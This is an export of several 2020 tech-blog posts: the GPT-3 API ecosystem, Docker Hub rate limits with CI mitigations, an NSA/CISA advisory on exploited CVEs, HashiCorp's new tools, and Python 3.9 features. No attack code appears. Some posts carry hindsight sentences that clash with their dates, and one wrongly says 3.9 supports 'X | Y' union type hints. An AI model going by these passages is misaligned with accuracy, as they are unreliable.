into something more interesting: an actual developer ecosystem. Startups are building products on the API, developers are integrating it into workflows, and the practical limitations are becoming as clear as the possibilities. As someone who\u0026rsquo;s been watching AI tools evolve for years, this feels like an inflection point worth examining.\nFrom Demo to Product # The early GPT-3 demos were impressive but felt like parlour tricks — generating blog posts, writing code snippets, creating mock-ups from text descriptions. They went viral, generated discussion, and then the question became: can you actually build a reliable product on this?\nThe answer, it turns out, is nuanced. Companies like Copy.ai and Viable are building commercial products using GPT-3 for marketing copy generation and customer feedback analysis respectively. ChatGPT\u0026rsquo;s launch would later democratize access to these capabilities. Several code-related tools have emerged that use GPT-3 to generate SQL queries from natural language, convert between programming languages, or explain code.\nWhat\u0026rsquo;s consistent across the successful applications is constraint. The tools that work well don\u0026rsquo;t give GPT-3 an open-ended task. They constrain the input format, limit the output domain, and add validation layers. A tool that converts natural language to SQL can verify the output is valid SQL before presenting it. A marketing copy generator can let humans edit and approve before publishing. The AI generates candidates; humans curate.\nThis pattern — AI as a suggestion engine with human oversight — isn\u0026rsquo;t new. It\u0026rsquo;s what autocomplete, spell-check, and recommendation systems have been doing for years. GPT-3 just applies it to a much broader set of tasks with a much more capable model.\nThe Developer Experience Challenge # Working with GPT-3 as a developer is a different experience from working with traditional APIs. With a REST endpoint for a payment processor or a mapping service, the contract is clear: send this input, get that output, handle these error cases. With GPT-3, the \u0026ldquo;contract\u0026rdquo; is a natural language prompt, and the output is probabilistic.\nThis creates several challenges I\u0026rsquo;ve been thinking about:\nPrompt engineering is the new programming: Getting consistent, useful output from GPT-3 requires carefully crafted prompts with examples, constraints, and formatting instructions. In-context learning would eventually evolve this discipline significantly. This is a skill that doesn\u0026rsquo;t map neatly to existing developer expertise. It\u0026rsquo;s part writing, part psychology, part systems thinking. We don\u0026rsquo;t have good tools, practices, or even vocabulary for it yet.\nTesting is hard: How do you write automated tests for a system whose output is non-deterministic? Traditional assertions break immediately. You need evaluation metrics that capture \u0026ldquo;good enough\u0026rdquo; rather than \u0026ldquo;exactly equal.\u0026rdquo; This is familiar territory for ML engineers but foreign to most application developers.\nCost management: GPT-3\u0026rsquo;s pricing is based on token usage, which means the cost of an API call depends on the input and output length. This is fundamentally different from most SaaS API pricing. A bug that generates verbose prompts or doesn\u0026rsquo;t limit output tokens can run up significant bills quickly.\nLatency: API response times for GPT-3 can range from a few hundred milliseconds to several seconds depending on the model and output length. For interactive applications, this means rethinking UX patterns — streaming responses, progressive rendering, or background processing with notifications.\nThe Open Questions # Several things about the GPT-3 ecosystem give me pause:\nVendor lock-in: Building on a closed API from a single provider is a significant risk. Regulatory frameworks like the EU AI Act would eventually address some of these vendor risks. OpenAI controls the model, the pricing, and the terms of service. They\u0026rsquo;ve already restricted certain use cases and can change policies at any time. There\u0026rsquo;s no self-hosted option, no alternative provider for the same model. If you build a business on GPT-3, you\u0026rsquo;re dependent on OpenAI\u0026rsquo;s continued goodwill and stability.\nBias and safety: GPT-3 is trained on internet text, which means it can generate biased, offensive, or factually incorrect output. For consumer-facing applications, this requires robust content filtering that effectively becomes a separate engineering challenge. OpenAI provides some safety guidelines, but the responsibility ultimately falls on developers building on the API.\nThe moat question: If your product is \u0026ldquo;GPT-3 plus a thin wrapper,\u0026rdquo; what happens when OpenAI (or Google, or Facebook) releases a competing product or when the next model generation makes your prompt engineering obsolete? The startups building on GPT-3 need to establish value beyond the underlying model — whether through data, UX, domain expertise, or integration depth.\nMy Take: Useful Today, Transformative Eventually # I\u0026rsquo;ve been building software for three decades, and I\u0026rsquo;ve seen enough technology cycles to know that the real impact of a new capability usually looks different from what the early demos suggest. GPT-3 isn\u0026rsquo;t going to replace programmers — that prediction comes up with every generation of developer tooling and never materializes. What it will do is gradually automate the tedious parts of knowledge work: drafting boilerplate, summarizing documents, translating between formats, generating initial versions of routine content.\nThe most promising applications I\u0026rsquo;m seeing are internal developer tools. Code documentation generators, log analysis assistants, natural-language-to-query interfaces for internal databases. AI-assisted development tools would eventually mature these patterns significantly. These are contexts where the audience is technical, the tolerance for imperfection is higher, and the cost-benefit calculation clearly favors automation.\nWhat excites me most is the ecosystem experimentation happening right now. Hundreds of developers are figuring out what works and what doesn\u0026rsquo;t with large language models in production. The patterns, tools, and best practices emerging from this period will shape how we integrate AI into software development for years to come.\nFor now, my advice is to experiment actively but build cautiously. Use GPT-3 for internal tools, prototypes, and applications where human oversight is built into the workflow. The technology is impressive, but our understanding of how to engineer reliable systems on top of probabilistic models is still in its infancy. We\u0026rsquo;re writing the playbook as we go.\n","date":"5 November 2020","externalUrl":null,"permalink":"/posts/201105-gpt3-developer-ecosystem/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s GPT-3 API is spawning a wave of developer tools and startups. The implications for software development are becoming clearer — and more nuanced — than the initial hype suggested.","title":"GPT-3 at Scale — What the Growing Developer Ecosystem Tells Us About AI's Next Chapter","type":"posts"},{"content":"Starting November 1st, Docker Hub is enforcing rate limits on image pulls. Anonymous users get 100 pulls per six hours, authenticated free users get 200, and paid subscribers get unlimited. If you\u0026rsquo;re reading this and thinking \u0026ldquo;that doesn\u0026rsquo;t affect me,\u0026rdquo; I\u0026rsquo;d encourage you to check your CI/CD pipelines before Monday morning. You might be surprised.\nDocker announced these changes back in August, but based on the conversations I\u0026rsquo;ve been having, a lot of teams are still not prepared. The grace period is over, and the reality of Docker Hub\u0026rsquo;s sustainability model is about to hit.\nThe Scale of the Problem # Docker Hub serves over 1 billion image pulls per day. A significant portion of those pulls come from automated systems — CI/CD pipelines, Kubernetes clusters pulling images on pod startup, development machines running docker-compose up. The vast majority of these pulls are unauthenticated because, until now, there was no reason to authenticate for public images.\nHere\u0026rsquo;s where it gets interesting: the rate limits are based on IP address for anonymous pulls. If your CI runners share a NAT gateway (common in cloud environments), all those runners share the same rate limit pool. An organization with 50 CI runners behind one public IP gets the same 100 pulls per six hours as a single developer on their laptop. That\u0026rsquo;s going to hurt.\nI did a quick audit of one of my projects this week: a single build that pulls 8 base images (Node, Python, Redis, PostgreSQL, nginx, and a few utility images). Running that build 15 times — a slow day for an active team — would exhaust the anonymous quota. Add in other projects sharing the same runners, and you can see how quickly this becomes a problem.\nWhat\u0026rsquo;s Actually Changing # Let\u0026rsquo;s be precise about the mechanics:\nAnonymous pulls (no Docker Hub login): 100 pulls per 6 hours per source IP Authenticated free (logged in, free account): 200 pulls per 6 hours per user Pro/Team (paid): unlimited Docker Official Images and Verified Publisher images: subject to the same limits Pulls from Docker Hub mirrors/caches are NOT counted against the limit The authentication piece is important. Simply logging in to Docker Hub (free account) doubles your quota and shifts rate limiting from IP-based to user-based. That alone solves the shared-IP problem for many teams. If you haven\u0026rsquo;t set up Docker Hub authentication in your CI runners, that\u0026rsquo;s the first thing to do.\n# In your CI pipeline, before any docker pull echo \u0026#34;$DOCKER_HUB_TOKEN\u0026#34; | docker login --username \u0026#34;$DOCKER_HUB_USER\u0026#34; --password-stdin Mitigating Strategies # Beyond authentication, there are several approaches to minimize the impact:\nRun a Pull-Through Cache # Docker\u0026rsquo;s registry supports a pull-through cache configuration. You run a local registry that proxies and caches Docker Hub images. First pull goes to Docker Hub; subsequent pulls are served from your cache. For organizations with multiple teams and CI pipelines, this dramatically reduces external pull traffic.\n# registry config.yml proxy: remoteurl: https://registry-1.docker.io username: your-dockerhub-user password: your-dockerhub-token This is what I\u0026rsquo;d recommend for any organization with more than a handful of developers. The setup is straightforward, it works with existing Docker clients (just configure the mirror in daemon.json), and it also speeds up pulls significantly since images are served from your local network.\nUse Multi-Stage Builds Efficiently # If your Dockerfiles pull the same base image in multiple stages, Docker counts each unique pull. But with proper layer caching on your build machines, images that are already present locally don\u0026rsquo;t generate pulls. Make sure your CI runners aren\u0026rsquo;t starting from a clean slate every build — or if they are, use docker pull strategically and leverage build caching.\nConsider Alternative Registries # This might be a good time to evaluate whether all your base images need to come from Docker Hub. Google Container Registry (gcr.io) hosts mirrors of many popular images. Amazon ECR Public launched earlier this month. GitHub Container Registry is in beta. Diversifying your image sources reduces dependency on any single registry.\nPin Image Digests # If you\u0026rsquo;re pulling by tag (e.g., node:14-alpine), every pull checks Docker Hub even if the underlying image hasn\u0026rsquo;t changed. Pinning to a specific digest (node@sha256:abc123...) allows Docker to skip the pull entirely if the image is already cached locally. This is a best practice regardless of rate limits — it also improves reproducibility.\nMy Take: Docker Hub\u0026rsquo;s Tragedy of the Commons # I have mixed feelings about this change. On one hand, Docker Hub has been providing an incredibly valuable service for free, and the cost of serving billions of pulls per day is substantial. The rate limits are generous enough that individual developers and small teams won\u0026rsquo;t notice. Docker needs a sustainable business model, and \u0026ldquo;giving everything away forever\u0026rdquo; isn\u0026rsquo;t one.\nOn the other hand, Docker Hub has positioned itself as the default registry for the entire container ecosystem. The docker pull command defaults to Docker Hub. Every tutorial, every getting-started guide, every FROM instruction in public Dockerfiles assumes Docker Hub. When you\u0026rsquo;re the default, you have a responsibility to the ecosystem that depends on you.\nThe timing also feels rough. We\u0026rsquo;re eight months into a pandemic, teams are stretched thin, and adding \u0026ldquo;fix all our Docker Hub authentication\u0026rdquo; to the operations backlog is unwelcome. Many organizations are discovering their pull volumes for the first time this week and scrambling.\nWhat this really highlights is the risk of depending on a single point of infrastructure you don\u0026rsquo;t control. We learned this lesson with npm (remember the left-pad incident in 2016?), and we\u0026rsquo;re learning it again with Docker Hub. If your builds can\u0026rsquo;t succeed without pulling images from a third-party service, you have a resilience problem.\nSet up a pull-through cache, authenticate your CI runners, and use this as motivation to evaluate your container supply chain. The rate limits aren\u0026rsquo;t going away, and honestly, they\u0026rsquo;re probably going to get tighter over time.\n","date":"29 October 2020","externalUrl":null,"permalink":"/posts/201029-docker-hub-rate-limiting/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Docker Hub’s new rate limits take effect November 1st. If you haven’t prepared your build pipelines, you’re about to find out the hard way.","title":"Docker Hub Rate Limits Are Coming — And Your CI Pipeline Might Break","type":"posts"},{"content":"This week, the NSA and CISA published a joint cybersecurity advisory detailing 25 CVEs that Chinese state-sponsored threat actors are actively exploiting. If you work in software and haven\u0026rsquo;t read it, you should. Not because the vulnerabilities are exotic — quite the opposite. The uncomfortable truth is that nearly every entry on the list has had patches available for months or even years. This isn\u0026rsquo;t a story about sophisticated zero-days. It\u0026rsquo;s a story about the basics.\nThe List That Should Keep You Up at Night # The advisory covers vulnerabilities across a wide range of products: Microsoft Exchange, Citrix ADC, Pulse Secure VPN, F5 BIG-IP, Atlassian Confluence, and several others. Here are some of the notable entries:\nCVE-2019-19781 (Citrix ADC) — Disclosed December 2019, exploited in the wild within weeks. Still being targeted in October 2020. CVE-2020-5902 (F5 BIG-IP) — Disclosed July 2020, CVSS 9.8. Exploitation began almost immediately. CVE-2019-11510 (Pulse Secure VPN) — Disclosed April 2019. Over a year old and still being used. CVE-2020-0688 (Microsoft Exchange) — February 2020 patch. Eight months later, still an active attack vector. The pattern is clear: public disclosure, patch release, and then a race between defenders applying the fix and attackers exploiting those who haven\u0026rsquo;t. The attackers are winning that race far too often.\nWhy Patching Remains So Hard # It\u0026rsquo;s easy to sit in an armchair and say \u0026ldquo;just patch your systems.\u0026rdquo; Anyone who\u0026rsquo;s managed production infrastructure knows it\u0026rsquo;s not that simple. But we need to be honest about why.\nLegacy dependencies: Many organizations run software that requires specific versions of underlying platforms. Patching the VPN appliance might break compatibility with the legacy ERP system that generates revenue. I\u0026rsquo;ve been in those meetings where the risk of patching is weighed against the risk of not patching, and the business case often wins in the wrong direction.\nTesting overhead: Proper patch validation requires staging environments that mirror production. For complex enterprises, this means weeks of testing before a patch can be rolled out. Meanwhile, the vulnerability is being actively exploited.\nVisibility gaps: You can\u0026rsquo;t patch what you don\u0026rsquo;t know you have. Shadow IT, forgotten appliances, acquired company infrastructure that was never fully inventoried — these are the systems that sit unpatched for years. The Pulse Secure VPNs still being exploited aren\u0026rsquo;t in well-managed environments; they\u0026rsquo;re the ones that fell off someone\u0026rsquo;s radar.\nUpdate fatigue: Between OS patches, application updates, firmware updates, and security advisories from dozens of vendors, IT teams are drowning in patches. Prioritization is essential but imperfect. The CVE scoring system helps, but a CVSS score of 9.8 doesn\u0026rsquo;t automatically mean your team will get to it this sprint.\nThe Supply Chain Angle # What caught my attention in the advisory is the inclusion of several network infrastructure products — VPN concentrators, application delivery controllers, load balancers. These are the devices that sit at the perimeter of networks and are, by definition, exposed to the internet. They\u0026rsquo;re also the devices most likely to be managed by a different team than the one responsible for application security.\nThis is the supply chain problem in microcosm. Your application code might be secure, your containers might be scanned, your CI/CD pipeline might enforce security gates — but if the VPN appliance in front of it all has a year-old unpatched RCE vulnerability, none of that matters.\nThe advisory also lists CVEs in Apache Struts (CVE-2017-5638, the Equifax breach vulnerability from 2017) and Confluence Server. These are application-layer vulnerabilities in software that many organizations deploy internally without the same patching discipline they apply to operating systems.\nWhat To Actually Do About It # Reading advisories like this can feel overwhelming, but there are concrete steps:\nAsset inventory first: You cannot secure what you cannot see. If you don\u0026rsquo;t have a comprehensive, up-to-date inventory of internet-facing assets and their software versions, that\u0026rsquo;s job number one. Tools like Shodan can help you discover what your organization has exposed.\nPrioritize by exposure: Not all of the 25 CVEs are equally relevant to every organization. Focus on what\u0026rsquo;s internet-facing and what\u0026rsquo;s in your stack. Cross-reference the advisory against your inventory.\nAutomate where possible: Configuration management tools (Ansible, Puppet, Chef) and infrastructure-as-code practices reduce the time from \u0026ldquo;patch available\u0026rdquo; to \u0026ldquo;patch deployed.\u0026rdquo; If patching still involves manual SSH sessions and maintenance windows scheduled by email, that\u0026rsquo;s a process problem.\nAssume breach: Given the length of time these vulnerabilities have been exploited, it\u0026rsquo;s worth assuming that if you had an unpatched system, it may already be compromised. Incident response planning and detection capabilities (logging, monitoring, EDR) are as important as patching.\nMy Take: This Is a Governance Failure # I\u0026rsquo;ve been in this industry long enough to know that the response to advisories like this will follow the usual pattern: a week of urgency, a flurry of patching activity, and then a slow return to the status quo. The next advisory will list different CVE numbers but the same underlying problem.\nThe root cause isn\u0026rsquo;t technical — it\u0026rsquo;s organizational. Patch management is a solved problem technically. We have the tools, the automation, the processes. What we lack is the governance framework that gives security teams the authority and resources to enforce timely patching, even when it\u0026rsquo;s inconvenient for the business.\nState-sponsored actors are not going to wait for your change management board to meet. The 25 CVEs in this advisory are the known ones being exploited right now. The question isn\u0026rsquo;t whether your organization has vulnerabilities — it\u0026rsquo;s whether you know about them and have a credible plan to address them.\nIf this advisory prompts one thing in your organization, let it be an honest assessment of your patching posture. Not the patching posture you report in compliance audits, but the real one.\n","date":"22 October 2020","externalUrl":null,"permalink":"/posts/201022-nsa-cisa-china-advisory/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A joint NSA/CISA advisory details 25 CVEs actively exploited by Chinese state-sponsored actors. The uncomfortable truth: most are well-known and patchable.","title":"NSA and CISA Sound the Alarm on Known Vulnerabilities — And We Should Listen","type":"posts"},{"content":"HashiConf Digital wrapped up this week, and HashiCorp dropped two new open-source projects that are clearly aimed at the gaps in their existing ecosystem: Waypoint for application deployment workflows and Boundary for secure remote access. After spending the past few days digging into both, I think they address real pain points — but the execution will determine whether they actually get traction.\nIf you\u0026rsquo;ve worked with HashiCorp\u0026rsquo;s stack (Terraform, Vault, Consul, Nomad), you know the tools are excellent individually but integrating them into a cohesive developer experience requires significant glue code and tribal knowledge. Waypoint and Boundary feel like an acknowledgment of that gap.\nWaypoint: One Workflow to Deploy Them All # Waypoint\u0026rsquo;s pitch is straightforward: define a waypoint.hcl file, run waypoint up, and your application gets built, deployed, and released — regardless of whether the target is Kubernetes, ECS, Nomad, or a plain Docker host. It\u0026rsquo;s an abstraction layer over deployment, similar in spirit to what Terraform does for infrastructure provisioning.\nproject = \u0026#34;my-app\u0026#34; app \u0026#34;web\u0026#34; { build { use \u0026#34;docker\u0026#34; {} } deploy { use \u0026#34;kubernetes\u0026#34; { probe_path = \u0026#34;/health\u0026#34; } } release { use \u0026#34;kubernetes\u0026#34; { load_balancer = true } } } What\u0026rsquo;s interesting is the explicit separation of build, deploy, and release phases. This isn\u0026rsquo;t new conceptually — we\u0026rsquo;ve been talking about this pattern since at least the Twelve-Factor App — but having it as a first-class concern in a deployment tool is nice. The release phase in particular, which handles traffic shifting and load balancer configuration, is where things usually get messy in practice.\nI\u0026rsquo;ve seen too many teams where deployment is a combination of shell scripts, CI pipeline steps, and kubectl commands stitched together with hope and documentation. Waypoint could clean that up, but only if it handles the edge cases. The initial plugin ecosystem covers the basics (Docker, Kubernetes, AWS ECS, Nomad), but real-world deployments inevitably involve custom steps — database migrations, feature flag updates, cache warming. The plugin architecture will need to be robust and extensible.\nBoundary: Identity-Based Access for the Zero Trust Era # Boundary is the more strategically interesting of the two launches. It\u0026rsquo;s a secure remote access solution built around identity rather than IP-based rules. Think of it as a modern replacement for VPNs and SSH bastion hosts, integrated with your identity provider.\nThe traditional approach to accessing internal infrastructure — VPN in, then SSH to a bastion, then hop to the target — is clunky and creates a poor audit trail. Boundary provides direct, authenticated access to resources based on who you are and what you\u0026rsquo;re authorized to do, with full session recording and logging.\nThis fits perfectly alongside Vault. Where Vault manages secrets and dynamic credentials, Boundary manages the access paths themselves. Together, they form a zero-trust access layer: Boundary authenticates and authorizes the session, Vault provides just-in-time credentials, and everything is logged and auditable.\nFor teams managing hybrid infrastructure — some on-prem, some in cloud, maybe multiple clouds — this is a compelling proposition. The identity-based approach means you don\u0026rsquo;t need to maintain complex network peering or VPN configurations just to let a developer access a staging database.\nThe Bigger Picture: HashiCorp\u0026rsquo;s Platform Play # These launches make HashiCorp\u0026rsquo;s strategy clear. They\u0026rsquo;re building a complete platform for infrastructure and application lifecycle management:\nTerraform provisions infrastructure Vault manages secrets and credentials Consul handles service networking and discovery Nomad (or Kubernetes) orchestrates workloads Boundary controls access to everything Waypoint gives developers a simple deployment interface Each tool works standalone and is open-source, but the real value proposition is the integrated cloud platform (HashiCorp Cloud Platform). It\u0026rsquo;s the classic open-source-to-enterprise playbook, and HashiCorp executes it better than most.\nI\u0026rsquo;ve been running Terraform and Vault in production for years, and the quality of the open-source offerings has consistently been high. But I\u0026rsquo;ve also seen organizations struggle with the operational overhead of running the full stack. HCP promises to reduce that, though at a cost that\u0026rsquo;s worth scrutinizing.\nMy Take: Promising, But Give It Time # Waypoint and Boundary are both at version 0.1.0, which means they\u0026rsquo;re nowhere near production-ready for most use cases. HashiCorp is transparent about this — the launch is about establishing direction and building community, not declaring victory.\nMy concerns with Waypoint are around flexibility. Deployment abstractions have been attempted many times (Heroku, Cloud Foundry, various PaaS offerings, even docker-compose in its own way), and they tend to work brilliantly for the 80% case and then fight you on the remaining 20%. HashiCorp\u0026rsquo;s track record with Terraform\u0026rsquo;s provider ecosystem gives me some confidence they understand extensibility, but it\u0026rsquo;s early days.\nBoundary I\u0026rsquo;m more bullish on, because it solves a problem that\u0026rsquo;s genuinely underserved by existing open-source tools. Commercial solutions like Teleport exist, but an open-source, identity-native access proxy from HashiCorp — with Vault integration — is a strong offering. The zero-trust access model is clearly where the industry is heading, especially with distributed teams becoming the norm rather than the exception in 2020.\nIf you\u0026rsquo;re already in the HashiCorp ecosystem, keep an eye on both. If you\u0026rsquo;re evaluating new infrastructure tooling, Boundary is the one I\u0026rsquo;d recommend experimenting with sooner rather than later. Waypoint needs at least a few more releases before I\u0026rsquo;d consider it for anything beyond personal projects.\nThe infrastructure tooling space continues to mature, and it\u0026rsquo;s encouraging to see HashiCorp investing in developer experience alongside the operations side. The best infrastructure is the kind developers don\u0026rsquo;t have to think about — and these tools are a step in that direction.\n","date":"15 October 2020","externalUrl":null,"permalink":"/posts/201015-hashicorp-waypoint-boundary/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"HashiCorp announced two new open-source tools at HashiConf Digital — Waypoint for application deployment and Boundary for secure remote access. Here’s why they matter.","title":"HashiCorp Launches Waypoint and Boundary — Closing the Developer Experience Gap","type":"posts"},{"content":"Python 3.9 officially landed on October 5th, right on schedule with the new annual release cadence. While most of the coverage is focused on the shiny new dictionary merge operator (|), there\u0026rsquo;s a lot more going on under the hood that deserves attention — particularly for those of us running Python in production environments.\nHaving tracked Python releases since the 2.x days, I can tell you that 3.9 feels like one of those \u0026ldquo;quietly important\u0026rdquo; releases. Not as dramatic as the 2-to-3 migration, but the kind of steady improvement that compounds over time.\nThe New PEG Parser # The headline feature that nobody\u0026rsquo;s talking about is PEP 617 — the switch from the old LL(1) parser to a new PEG-based parser. On the surface, this changes nothing for existing code. Your scripts will parse and run identically. But this is a foundational change.\nThe LL(1) parser had real limitations. Grammar hacks and workarounds littered the CPython codebase because certain constructs simply couldn\u0026rsquo;t be expressed cleanly. The new PEG parser removes these constraints, which means future Python versions can introduce syntax that was previously impossible or impractical. Later Python releases continued to leverage this parser foundation for new capabilities. Think of it as replacing the foundation of a house — the rooms look the same today, but you can now build additions that weren\u0026rsquo;t structurally possible before.\nFor Python 3.9, both parsers ship side by side, with PEG as the default. The old parser is still available via a flag for anyone who hits edge cases. That\u0026rsquo;s the kind of careful migration strategy I appreciate in a language that powers everything from data science notebooks to critical infrastructure.\nDictionary Merge and Update Operators # Now, the feature everyone\u0026rsquo;s actually excited about — PEP 584. You can now merge dictionaries with | and update with |=:\nconfig_defaults = {\u0026#34;timeout\u0026#34;: 30, \u0026#34;retries\u0026#34;: 3} user_overrides = {\u0026#34;timeout\u0026#34;: 60, \u0026#34;debug\u0026#34;: True} merged = config_defaults | user_overrides # {\u0026#39;timeout\u0026#39;: 60, \u0026#39;retries\u0026#39;: 3, \u0026#39;debug\u0026#39;: True} Is this a game-changer? Not really. We\u0026rsquo;ve had {**d1, **d2} since Python 3.5, and dict.update() since forever. But the new syntax is cleaner and more readable, especially when you\u0026rsquo;re chaining multiple merges. Python language evolution continued to prioritize developer experience. In configuration management code — which I write a lot of — this is a genuine quality-of-life improvement.\nThe |= update operator is particularly nice for in-place modifications without needing a separate method call. It follows the pattern established by sets, which already support | for union operations. Consistency in language design matters more than people think.\nType Hinting Gets Simpler # PEP 585 is the change that\u0026rsquo;ll affect my daily coding the most. You can now use built-in collection types directly in type hints instead of importing from typing:\n# Before from typing import List, Dict, Tuple def process(items: List[Dict[str, Tuple[int, ...]]]) -\u0026gt; None: ... # Python 3.9 def process(items: list[dict[str, tuple[int, ...]]]) -\u0026gt; None: ... This might seem trivial, but when you\u0026rsquo;ve got a codebase where every module starts with from typing import ..., eliminating that boilerplate is welcome. More importantly, it makes type hints feel like a first-class citizen rather than an add-on library feature. I\u0026rsquo;ve been pushing type hints on my teams for the past two years, and any friction reduction helps adoption.\nTimezone Support and String Methods # Two smaller additions that deserve mention: PEP 615 adds IANA timezone support to the standard library via zoneinfo. No more reaching for pytz for basic timezone operations. As someone who\u0026rsquo;s debugged timezone-related production incidents more times than I care to admit, having this in stdlib is overdue.\nThe new str.removeprefix() and str.removesuffix() methods (PEP 616) also fill a gap that\u0026rsquo;s caused subtle bugs. I\u0026rsquo;ve seen too many uses of lstrip() where developers assumed it strips a prefix rather than a set of characters. The new methods do exactly what the name says, nothing more.\nMy Take: The Maturation Continues # Python 3.9 isn\u0026rsquo;t flashy, and that\u0026rsquo;s exactly what I want from a language release in 2020. The Python core team has found a good rhythm with annual releases — each one delivers enough to be worth upgrading without breaking the world.\nMy main concern is the ongoing fragmentation in deployment environments. With Python 2 finally end-of-lifed in January, and now four maintained 3.x versions (3.6 through 3.9), library maintainers still carry significant compatibility burden. The deprecation of distutils in 3.9 and the ongoing packaging ecosystem improvements are steps in the right direction, but we\u0026rsquo;re not there yet.\nFor production environments, I\u0026rsquo;d recommend waiting for 3.9.1 (expected in December) before deploying. First point releases always catch the early bugs that only show up at scale. In the meantime, start testing your CI pipelines against 3.9 and update your type hints to use the new syntax — it\u0026rsquo;s backward-compatible with from __future__ import annotations.\nThe new parser is the real story here. It\u0026rsquo;s the kind of long-term investment that pays dividends over the next decade of Python development. The features in 3.10 and beyond will likely be more ambitious because of it.\n","date":"8 October 2020","externalUrl":null,"permalink":"/posts/201008-python39-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.9 dropped this week with new parser, dict merge operators, and type hinting improvements — here’s what actually matters for production code.","title":"Python 3.9 Is Here — And It's More Than Just Dictionary Merging","type":"posts"},{"content":"Python 3.9 is officially out, and while it doesn\u0026rsquo;t have the dramatic headline of Python 2\u0026rsquo;s end-of-life (RIP, January 2020), it\u0026rsquo;s packed with quality-of-life improvements that reflect where the language is heading. This is the first version to drop support for Windows 7, the first built with a new parser, and it brings some syntactic sugar that I\u0026rsquo;ve been wanting for years.\nLet me walk through what matters.\nDictionary Merge and Update Operators # This is the one I\u0026rsquo;m most excited about. Python 3.9 introduces the | operator for merging dictionaries and |= for updating them in place:\n# Merging dictionaries — creates a new dict defaults = {\u0026#34;color\u0026#34;: \u0026#34;blue\u0026#34;, \u0026#34;size\u0026#34;: \u0026#34;medium\u0026#34;} overrides = {\u0026#34;size\u0026#34;: \u0026#34;large\u0026#34;, \u0026#34;weight\u0026#34;: \u0026#34;heavy\u0026#34;} config = defaults | overrides # {\u0026#39;color\u0026#39;: \u0026#39;blue\u0026#39;, \u0026#39;size\u0026#39;: \u0026#39;large\u0026#39;, \u0026#39;weight\u0026#39;: \u0026#39;heavy\u0026#39;} # Update in place defaults |= overrides Before this, you had several options, none of them great:\n# The unpacking approach (3.5+) config = {**defaults, **overrides} # The copy-and-update approach config = defaults.copy() config.update(overrides) # The ChainMap approach from collections import ChainMap config = dict(ChainMap(overrides, defaults)) The unpacking syntax {**a, **b} works but isn\u0026rsquo;t obvious to newcomers, and it doesn\u0026rsquo;t generalize to update-in-place. The | operator is clean, readable, and consistent with set operations that already use the same symbol. It\u0026rsquo;s one of those changes where you wonder why it took so long — and then you read the PEP discussions and remember that Python\u0026rsquo;s design process is thorough to a fault.\nType Hinting Gets Simpler # PEP 585 brings a change I\u0026rsquo;ve been looking forward to: you can now use built-in collection types directly in type hints instead of importing from typing:\n# Before (still works, but verbose) from typing import List, Dict, Tuple def process(items: List[str]) -\u0026gt; Dict[str, Tuple[int, int]]: ... # Python 3.9 def process(items: list[str]) -\u0026gt; dict[str, tuple[int, int]]: ... No more from typing import List, Dict, Set, Tuple, FrozenSet. You just use list, dict, set, tuple directly with subscripts. The typing module equivalents are now deprecated (though they\u0026rsquo;ll work for the foreseeable future).\nThis pairs nicely with PEP 604, which lets you write X | Y instead of Union[X, Y]. The dictionary merge operator combined with improved union types shows Python\u0026rsquo;s steady evolution toward more expressive syntax while maintaining backward compatibility:\n# Before from typing import Union def fetch(id: Union[int, str]) -\u0026gt; Union[dict, None]: ... # Python 3.9+ def fetch(id: int | str) -\u0026gt; dict | None: ... These changes reduce the boilerplate tax of type hints significantly. I\u0026rsquo;ve seen teams resist adopting type hints partly because of the import overhead and verbose syntax. These improvements remove that excuse.\nThe New PEG Parser # Under the hood, Python 3.9 ships with a completely new parser based on Parsing Expression Grammar (PEG), replacing the LL(1) parser that Python has used since its inception. The old parser is still available via -X oldparser but is scheduled for removal in 3.10.\nFor most developers, this change is invisible — existing syntax parses exactly the same way. The significance is in what it enables for future versions. The LL(1) parser had fundamental limitations that made certain syntax proposals impossible. The PEG parser doesn\u0026rsquo;t share those constraints, which opens the door for more expressive syntax in future Python releases.\nThe Python core team has been careful to note that the new parser produces identical results for all existing Python code. This is a foundation change, not a feature change — its impact will be felt in future releases, not this one.\nString Methods and Time Zone Support # Two smaller additions worth mentioning:\nstr.removeprefix() and str.removesuffix() are finally here. If you\u0026rsquo;ve ever written this pattern:\nif filename.startswith(\u0026#34;test_\u0026#34;): name = filename[len(\u0026#34;test_\u0026#34;):] You can now write:\nname = filename.removeprefix(\u0026#34;test_\u0026#34;) It\u0026rsquo;s safer (no off-by-one on the slice length) and more readable. I\u0026rsquo;ve had helper functions for this in my personal utility libraries for years. Nice to see it in the standard library.\nOn the time zone front, the zoneinfo module brings IANA time zone support into the standard library. No more reaching for pytz for basic time zone handling:\nfrom zoneinfo import ZoneInfo from datetime import datetime dt = datetime.now(tz=ZoneInfo(\u0026#34;Europe/Amsterdam\u0026#34;)) As someone based in the Netherlands, I appreciate not needing a third-party package just to correctly represent my local time.\nMy Take # Python 3.9 is not a revolutionary release, and that\u0026rsquo;s perfectly fine. The language is in a phase where incremental refinement serves the community better than dramatic changes. The dictionary operators and simplified type hints are exactly the kind of improvements that make daily coding a little smoother without requiring anyone to relearn the language.\nThe PEG parser is the most strategically important change, even though you won\u0026rsquo;t notice it today. It\u0026rsquo;s an investment in Python\u0026rsquo;s future expressiveness, and I\u0026rsquo;m curious to see what syntax proposals emerge now that the parser is no longer the bottleneck.\nIf you\u0026rsquo;re still on 3.7 or 3.8, there\u0026rsquo;s no urgent reason to upgrade immediately — but start testing your codebases against 3.9 now. The typing improvements alone are worth the move for any team that\u0026rsquo;s invested in type hints. And those dictionary merge operators? They\u0026rsquo;re going to become second nature faster than you\u0026rsquo;d expect.\nPython continues its steady march forward. No hype, no drama, just consistent improvement. After thirty years of watching programming languages come and go, I can tell you that\u0026rsquo;s exactly the recipe for longevity.\n","date":"1 October 2020","externalUrl":null,"permalink":"/posts/201001-python-39-new-features/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.9 arrives with dictionary merge operators, relaxed type hint syntax, and a new parser that sets the stage for the language’s future.","title":"Python 3.9 — Dictionary Unions, Type Hints, and the Steady March Forward","type":"posts"},{"content":"Last Friday, Evan You officially released Vue.js 3.0, codenamed \u0026ldquo;One Piece.\u0026rdquo; After more than two years of development and extensive community RFC processes, the third major version of Vue is here — and it\u0026rsquo;s not an incremental update. It\u0026rsquo;s a ground-up rewrite in TypeScript with 